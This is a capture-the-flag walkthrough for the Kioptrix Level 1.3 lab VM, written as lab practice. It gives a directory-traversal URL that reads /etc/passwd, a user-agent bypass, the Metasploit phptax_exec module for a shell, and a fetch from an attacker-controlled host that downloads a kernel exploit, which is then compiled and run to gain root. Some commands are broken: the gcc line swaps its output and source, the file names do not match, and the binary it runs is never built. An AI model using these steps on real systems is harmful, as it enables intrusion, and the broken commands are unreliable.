Hack the Kioptrix VM (CTF Challenge)

Today we going to solve Kioptrix: Level 1.3 (#4). It is Boot2Root series provided for practice. Hints we have from author are :

  • It’s possible to remotely compromise the machine
  • Stays within the target audience of this site
  • Must be “realistic” (well kinda…)
  • Should serve as a refresher for me. Be it PHP or MySQL usage etc.

So basically, its security level is from beginner to intermediate. Lets try to break through it. But before please note that you can download it from à https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

WalkThrough

As always start off by finding the target.

netdiscover

And so our target is 192.168.0.101. We will now scan it via nmap.

nmap –p- -A 192.168.0.101

With the result of nmap you can see that service of HTTP is running on two ports i.e. 80 and 8080 along with the service of SSH on 22 port. As we have HTTP service running we should try and open it in our browser.

There is nothing on the webpage except it says “it works!”, let’s have a look on its source code.

In its source code there is URL mentioned i.e. pChart2.1.3/index.php. Open this URL.

And so the ULR opens an it takes us to php library. pChart is basically PHP library that helps us to create or manage anti-aliased charts or pictures directly from the web-server. I searched google more to learn about it and stumbled upon some useful information i.e. this version of pCharts was vulnerable. Therefore, I  searched for its exploit on exploit-db.com.

And so I found an appropriate exploit. When you explore the exploit there is a link given :

hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

I opened this link except I used the VM’s IP and found the following page :

The information on this page isn’t useful at all. Then I remembered that http service was opened on 8080 port too. So I opened the IP on the port 8080.

But the access was forbidden. I tried to very method to bypass this forbidden access but nothing worked other than user agent. So to access this page go to Tools menu from the menu bar. A drop down menu will appear. From this menu select Default User Agent. Another menu will open and from this select Internet Explorer, from this another menu will open and from it select Internet Explorer 6.

And fortunately we have the access to the page. And found file called phptax/

Now open this link and you will have the following page :

The page was of phptax. Phptax is a kind of CMS for linux. Its aim is to develop a tax program which uses databaseless methodology that fits in one line text files. Using the Phptax does not requires SQL databases that are generally used in this program. And to our luck there a exploit of Phptax in metsapsloit, for that simply type search phptax  in metasploit.

To use this exploit simply type the following in metasploit :

use exploit/multi/http/phptax_exec

set rhost 192.168.0.101

set rport 8080

exploit

After this, you wil directly reach the shell then type :

id

uname -a         

These above commands are used to know the id and the version of Kernel.

There is a exploit for this version of kernel in exploit-db.com. Download it and save the file as shown :

Next, type the following command to get the exploit from its by default location :

fetch http://192.168.0.104/28818.c

Here, we used fetch command because wget command wasn’t working as its security level here was a bit high. So, using fetch is an substitute for wget command and so we are directly using it from the browser.

Then type the following set of commands to execute the exploit :

ls

gcc –o 28718.c kernel

ls

chmod 777 exploit

./exploit

As the exploit executes you will reach the root. And to confirm this type :

id

Then moving forward go to the root folder by typing :

cd /root

Let’s see what directories it has and for that type :

ls

Here we have a congrats.txt named text file and I am hoping this will be our flag so to read it type :

cat congrats.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

Related Posts Plugin for WordPress, Blogger...

Leave a Reply